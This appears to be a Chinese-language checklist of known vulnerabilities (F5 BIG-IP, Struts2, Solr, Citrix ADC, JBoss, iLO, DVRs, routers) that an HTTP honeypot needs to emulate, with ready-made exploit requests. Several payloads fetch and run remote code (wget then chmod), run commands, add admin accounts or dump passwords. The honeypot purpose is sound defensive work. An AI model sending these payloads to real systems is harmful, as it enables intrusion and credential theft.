HTTP 蜜罐中需要模拟响应的漏洞&服务

CVE-2020-5902 - F5 BIG-IP Remote Code Execution

description

在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。未授权的远程攻击者通过向该页面发送特制的请求包，可以造成任意Java 代码执行。进而控制 F5 BIG-IP 的全部功能，包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。
任意文件读取

• https://IP:8443/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=

远程命令执行

• https://{0}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=

reference

https://github.com/zhzyker/exphub/tree/master/f5
https://github.com/dunderhay/CVE-2020-5902/blob/master/CVE-2020-5902.py

Dasan Networks GPON ONT WiFi Router H640X 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Remote Code Execution

description

Dasan GPON ONT WiFi Router是韩国DASAN Networks公司的一款无线路由器设备。Dasan GPON ONT WiFi Router H640X 12.02-0112版本、2.77p1-1124版本和3.03p2-1146版本中存在缓冲区溢出漏洞。攻击者可通过向 /cgi-bin/login_action.cgi 文件中的‘login_action’函数发送较长的POST请求利用该漏洞执行任意代码。

POST /cgi-bin/login_action.cgi HTTP/1.1
Host: 192.168.1.100:8080
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.100:8080/cgi-bin/login.cgi
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 868

action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA*Ԍ�CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC*�@;;;;;;;;;;;;;;;;;;;;;;;;wget http://1.1.1.1&txtUserId=a&button=Login&txtPassword=a&sle_Language=english

reference

https://www.exploit-db.com/exploits/44074

JBoss

description

CVE-2017-12149 - JBoss 5.x/6.x 反序列化漏洞

• 该漏洞出现在 /invoker/readonly 请求中，服务器将用户提交的POST内容进行了Java反序列化。
  直接将序列化数据作为POST body发送至/invoker/readonly即可

CVE-2017-7504 - JBoss 4.x JBossMQ JMS 反序列化漏洞

• 该漏洞出现在 /jbossmq-httpil/HTTPServerILServlet 中，直接把序列化数据POST。

CVE-2015-7501 - JMXInvokerServlet 反序列化漏洞

• 该漏洞出现在 /invoker/JMXInvokerServlet 中，与前一个类似。

jmx-console 和 web-console

• /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo
• /web-console/ServerInfo.jsp

reference

https://github.com/vulhub/vulhub/tree/master/jboss
https://www.exploit-db.com/exploits/36575

CVE-2018-11776 - Apache Struts2 S2-057

description

struts-pwn_CVE-2018-11776使用数值计算的方式进行check。其首先生成一个随机数比如93，然后构造${{93*93}} 替换url的一部分。

以http://example.com/demo/struts2-showcase/index.action为例，会构造三个注入点依次测试：
http://example.com/${{93*93}}/index.action
http://example.com/demo/${{93*93}}/index.action
http://example.com/demo/struts2-showcase/${{93*93}}/index.action

GET /$%7B%7B93*93%7D%7D/index.action HTTP/1.1
Host: x.x.x.x
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)

如果响应的Location字段返回了数值计算即93*93的结果则存在漏洞。根据注入点
构造payload

GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27<----PAYLOAD---->%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/index.action HTTP/1.1
Host: x.x.x.x
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)

reference

https://github.com/mazen160/struts-pwn_CVE-2018-11776

HomeMatic Zentrale CCU2 RCE

description

首先向 /api/backup/version.cgi 发送GET请求

GET /api/backup/version.cgi HTTP/1.1
Accept-Encoding: identity
Host: x.x.x.x
Connection: close
User-Agent: Python-urllib/2.7

如果返回了VERSION=x.x.x则继续发送payload

GET /api/backup/logout.cgi?sid=aa");system.Exec("wget+-O+/tmp/exploit+http://127.0.0.1:1234/exploit&&chmod+%2bx+/tmp/exploit");system.ClearSessionID("bb HTTP/1.1
Accept-Encoding: identity
Host: x.x.x.x
Connection: close
User-Agent: Python-urllib/2.7

reference

https://www.exploit-db.com/exploits/45052

CVE-2019-0192 & CVE-2019-0193- Apache Solr RCE

description

CVE-2019-0192

1. GET请求 /solr/admin/cores?wt=json ，如果响应中包含 status 字段如{“status”:{“abcdefgh”:”1”},}，则存在cores节点
2. 之后向 /solr/abcdefgh/config 发送POST请求。

CVE-2019-0193

1. GET请求 /solr/admin/cores ，跟上一个类似的是响应中包含 status 字段则存在cores节点。
2. GET请求 /solr/admin/info/system ，获取响应中 system 字段的 name 、 uname 和 version 。
3. POST请求 /solr/abcdefgh/config —— init node config。
4. GET请求/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27<-----command----->%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end执行任意代码。

reference

https://github.com/Imanfeng/Apache-Solr-RCE
https://github.com/mpgn/CVE-2019-0192/blob/master/CVE-2019-0192.py
https://www.exploit-db.com/exploits/47572

Belkin N600DB - Multiple Vulnerabilities

description

Disclore wifi password:
curl --silent "http://192.168.2.1/langchg.cgi" , curl --silent "http://192.168.2.1/adv_wifidef.cgi"
Closed “HTTPD server” port:
curl --silent "http://192.168.2.1/removepwd.cgi" --data ""
Web Backdoor:
http://192.168.2.1/dev.htm
Server-Side Request Forgery (HTTP/FTP):
curl --silent "http://192.168.2.1/proxy.cgi?chk&url=http://45.33.32.156/"
Command Injection:
curl --silent "http://192.168.2.1/proxy.cgi?chk&url=--help"

reference

https://www.exploit-db.com/exploits/43682

AVTECH DVR multiple vulnerabilities

description

在AVTHCH AVN801 DVR中发现了多个漏洞：

1. CVE-2013-4980：通过利用RTSP数据包处理程序中的缓冲区溢出来执行任意代码

   SETUP Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2AaLSaLS RTSP/1.0
   CSeq: 1
   User-Agent: VLC media player (LIVE555 Streaming Media v2010.02.10)

2. CVE-2013-4981：通过特制的HTTP POST请求利用 /cgi-bin/user/Config.cgi 中的缓冲区溢出来执行任意代码

   POST /cgi-bin/user/Config.cgi?action=set&Network.SMTP.Receivers=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
   Host: x.x.x.x
   Accept-Encoding: identity
   Content-Length: 0

3. CVE-2013-4982：绕过管理登录控制台的验证码，启用多个automated attack vectors。uri中有 /cgi-bin/nobody/VerifyCode.cgi

   GET /cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=&captcha_code=FMUA&verify_code=FMUYyLOivRpgc HTTP/1.1
   Host: x.x.x.x
   Accept-Encoding: identity

reference

https://www.coresecurity.com/core-labs/advisories/avtech-dvr-multiple-vulnerabilities

CVE-2017-12542

description

iLO 全名是 Integrated Lights-out，它是惠普某些型号的服务器上集成的远程管理端口，它能够允许用户基于不同的操作系统从远端管理服务器。iLO 4中的CVE-2017-12542可以允许未经身份验证的远程攻击者绕过验证并执行任意代码。
当uri等于 /rest/v1/Accountservice/Accounts 且HTTP Headers中的Connection字段大于等于29个字符时即可绕过验证。在exp中如果收到的json中没有error和Items字段则认为漏洞存在。
向目标post添加用户的数据包，且Connection仍然大于等于29个字符，即可成功添加用户。

POST /rest/v1/accountservice/accounts HTTP/1.1
Host: x.x.x.x
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.19.1
Content-Length: 253
Content-Type: application/json

{"UserName": "admin", "Password": "admin123", "Oem": {"Hp": {"Privileges": {"RemoteConsolePriv": true, "iLOConfigPriv": true, "VirtualMediaPriv": true, "UserConfigPriv": true, "VirtualPowerAndResetPriv": true, "LoginPriv": true}, "LoginName": "admin"}}}

reference

https://github.com/skelsec/CVE-2017-12542/blob/master/exploit_1.py
https://www.freebuf.com/vuls/167124.html

CVE-2019-19781

description

Citrix ADC的RCE漏洞。在 /vpns/ 路径中有一个目录遍历漏洞。

• 首先通过POST请求通过目录遍历漏洞创建恶意XML，payload包含在POST data中

  POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0
  NSC_USER: ../../../netscaler/portal/templates/sobxivwokx
  NSC_NONCE: 7
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 97
  
  url=127.0.0.1&title=[% template.new({'BLOCK'='print readpipe( xxxx )'})%]&desc=desc&UI_inuse=a

• 然后通过GET请求去执行payload

  GET /vpn/../vpns/portal/sobxivwokx.xml HTTP/1.1
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0
  NSC_USER: dgxgvoankd
  NSC_NONCE: 7

reference

https://github.com/MalwareTech/CitrixHoneypot/blob/master/CitrixHoneypot.py
https://github.com/trustedsec/cve-2019-19781
https://github.com/jas502n/CVE-2019-19781
https://www.jianshu.com/p/03b175711524
https://www.anquanke.com/post/id/197074?native.theme=2

Kguard SHA104 / SHA108 Bypass / Command Injection

description

sha104和sha108都是Kguard公司的数字硬盘录像机，在处理身份验证和授权方面存在缺陷。例如，请求HI_SRDK_SYS_USERMNG_GetUserList会显示所有的用户名和密码：

REMOTE HI_SRDK_SYS_USERMNG_GetUserList MCTP/1.0
CSeq: 6
Accept: text/HDP
Content-Type: text/HDP
Func-Version: 0x10
Content-Length: 51
3Segment-Num: 1
Segment-Seq: 1
Data-Length: 4

VMCTP/1.0 200 OK
Content-Type: text/HDP
CSeq: 6
Return-Code: 0
Content-Length: 2326
Segment-Num: 2
Segment-Seq: 1
Data-Length: 2240
eric
111222
111222
admin
111222
111222

特征是在Request中的HTTP版本部分是 MCTP 。另外还可以进行更改用户密码等操作。

reference

https://cxsecurity.com/issue/WLB-2015030061

IBM QRadar SIEM Unauthenticated Remote Code Execution

description

uri: /ForensicsAnalysisServlet/
在第二个链接中有具体的利用过程。

GET /ForensicsAnalysisServlet/?action=someaction HTTP/1.1
Cookie: SEC=owned; QRadarCSRF=superowned;

HTTP/1.1 200 OK
{"exceptionMessageValue":"javax.servlet.ServletException: No valid forensics analysis solrDocIds parameter found."}

reference

https://www.exploit-db.com/exploits/45005
https://ssd-disclosure.com/ssd-advisory-qradar-remote-command-execution/

Else

docker, es, hbase, hadoop, phpadmin, cms, couchdb, orientdb, upnp, ipmi, rpc, a2billing, boa